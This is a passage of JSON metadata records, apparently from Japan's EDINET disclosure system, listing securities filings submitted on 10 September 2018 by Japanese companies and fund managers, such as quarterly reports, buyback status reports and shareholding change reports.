"seqNumber": 124,
"docID": "S100E2WE",
"edinetCode": "E11943",
"secCode": null,
"JCN": null,
"filerName": "Evo Fund",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "変更報告書",
"issuerEdinetCode": "E27615",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CTCN",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 125,
"docID": "S100E2YU",
"edinetCode": "E33637",
"secCode": null,
"JCN": "6010001187433",
"filerName": "日本郵政キャピタル株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E32571",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E2IZ",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 126,
"docID": "S100E2DF",
"edinetCode": "E04592",
"secCode": "96360",
"JCN": "1120001005118",
"filerName": "株式会社きんえい",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 09:40",
"docDescription": "四半期報告書-第122期第2四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 127,
"docID": "S100DY76",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12401",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:40",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFT7",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 128,
"docID": "S100E2YL",
"edinetCode": "E01841",
"secCode": "69860",
"JCN": "9040001059420",
"filerName": "双葉電子工業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "053000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:42",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第19条第2項第3号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 129,
"docID": "S100E2DH",
"edinetCode": "E04592",
"secCode": "96360",
"JCN": "1120001005118",
"filerName": "株式会社きんえい",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:43",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 130,
"docID": "S100DNVZ",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11824",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:45",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 131,
"docID": "S100E02M",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10224",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:47",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第9期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 132,
"docID": "S100E2DQ",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G13131",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:48",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 133,
"docID": "S100E02J",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10224",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:48",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 134,
"docID": "S100E029",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10223",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:49",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第9期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 135,
"docID": "S100E2DR",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G13132",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:50",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 136,
"docID": "S100E01Y",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10223",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:50",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 137,
"docID": "S100E0KK",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G03675",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:50",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 138,
"docID": "S100E0KL",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G04986",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:51",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 139,
"docID": "S100E2DP",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G13133",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:51",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 140,
"docID": "S100E0KM",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G05078",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:51",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 141,
"docID": "S100E0KN",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G07714",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:52",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 142,
"docID": "S100E0KP",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G09038",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:53",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 143,
"docID": "S100E0KQ",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G09319",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:53",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 144,
"docID": "S100E0KR",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G09317",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:54",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 145,
"docID": "S100E0KS",
"edinetCode": "E12453",
"secCode": null,
"JCN": "9010001025953",
"filerName": "ニッセイアセットマネジメント株式会社",
"fundCode": "G10004",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:54",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 146,
"docID": "S100E26U",
"edinetCode": "E03606",
"secCode": "83060",
"JCN": "4010001073486",
"filerName": "株式会社三菱UFJフィナンシャル・グループ",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:54",
"docDescription": "変更報告書",
"issuerEdinetCode": "E00784",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 147,
"docID": "S100E2PB",
"edinetCode": "E05346",
"secCode": "84390",
"JCN": "6010401015821",
"filerName": "東京センチュリー株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "113001",
"docTypeCode": "090",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:56",
"docDescription": "訂正発行登録書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100C96Z",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 148,
"docID": "S100E1Y6",
"edinetCode": "E02962",
"secCode": "27840",
"JCN": "3010001084757",
"filerName": "アルフレッサホールディングス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:58",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 149,
"docID": "S100E1N7",
"edinetCode": "E03116",
"secCode": "82140",
"JCN": "5020001091635",
"filerName": "株式会社AOKIホールディングス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:00",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 150,
"docID": "S100E2YA",
"edinetCode": "E02541",
"secCode": "80380",
"JCN": "9010001034847",
"filerName": "東都水産株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:07",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 151,
"docID": "S100E2LQ",
"edinetCode": "E01503",
"secCode": "61420",
"JCN": "5180301019188",
"filerName": "富士精工株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:10",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 152,
"docID": "S100E2ZH",
"edinetCode": "E02742",
"secCode": "98240",
"JCN": "2120001066027",
"filerName": "泉州電業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 10:10",
"docDescription": "四半期報告書-第69期第3四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 153,
"docID": "S100E2ZK",
"edinetCode": "E02742",
"secCode": "98240",
"JCN": "2120001066027",
"filerName": "泉州電業株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:13",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 154,
"docID": "S100E27Q",
"edinetCode": "E02204",
"secCode": "72790",
"JCN": "1140001081875",
"filerName": "株式会社ハイレックスコーポレーション",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 10:15",
"docDescription": "四半期報告書-第75期第3四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 155,
"docID": "S100E27O",
"edinetCode": "E02204",
"secCode": "72790",
"JCN": "1140001081875",
"filerName": "株式会社ハイレックスコーポレーション",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:17",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 156,
"docID": "S100E2ZC",
"edinetCode": "E00436",
"secCode": "28020",
"JCN": "8010001034740",
"filerName": "味の素株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:19",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 157,
"docID": "S100E2Z9",
"edinetCode": "E33637",
"secCode": null,
"JCN": "6010001187433",
"filerName": "日本郵政キャピタル株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:21",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E31681",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E2KZ",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 158,
"docID": "S100DYZS",
"edinetCode": "E03628",
"secCode": null,
"JCN": "9010001034962",
"filerName": "みずほ信託銀行株式会社",
"fundCode": "G07757",
"ordinanceCode": "030",
"formCode": "09A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 10:21",
"docDescription": "有価証券報告書(内国信託受益証券等)-第17期(平成29年12月12日-平成30年6月11日)【みなし訂正有価証券届出書】",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CGGN",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 159,
"docID": "S100E2VH",
"edinetCode": "E04804",
"secCode": "97440",
"JCN": "1180001027412",
"filerName": "株式会社メイテック",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:30",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 160,
"docID": "S100E2FP",
"edinetCode": "E04817",
"secCode": "97570",
"JCN": "1120001069955",
"filerName": "株式会社船井総研ホールディングス",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:33",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 161,
"docID": "S100E2VV",
"edinetCode": "E22083",
"secCode": null,
"JCN": "6010001083062",
"filerName": "三井物産企業投資株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 10:42",
"docDescription": "変更報告書",
"issuerEdinetCode": "E05328",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 162,
"docID": "S100E2ZY",
"edinetCode": "E05680",
"secCode": "38430",
"JCN": "8011001034292",
"filerName": "フリービット株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 10:42",
"docDescription": "四半期報告書-第19期第1四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 163,
"docID": "S100E2NM",
"edinetCode": "E33416",
"secCode": "92670",
"JCN": "5210001016969",
"filerName": "Genky DrugStores株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "030000",
"docTypeCode": "120",
"periodStart": "2017-12-21",
"periodEnd": "2018-06-20",
"submitDateTime": "2018-09-10 10:42",
"docDescription": "有価証券報告書-第1期(平成29年12月21日-平成30年6月20日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
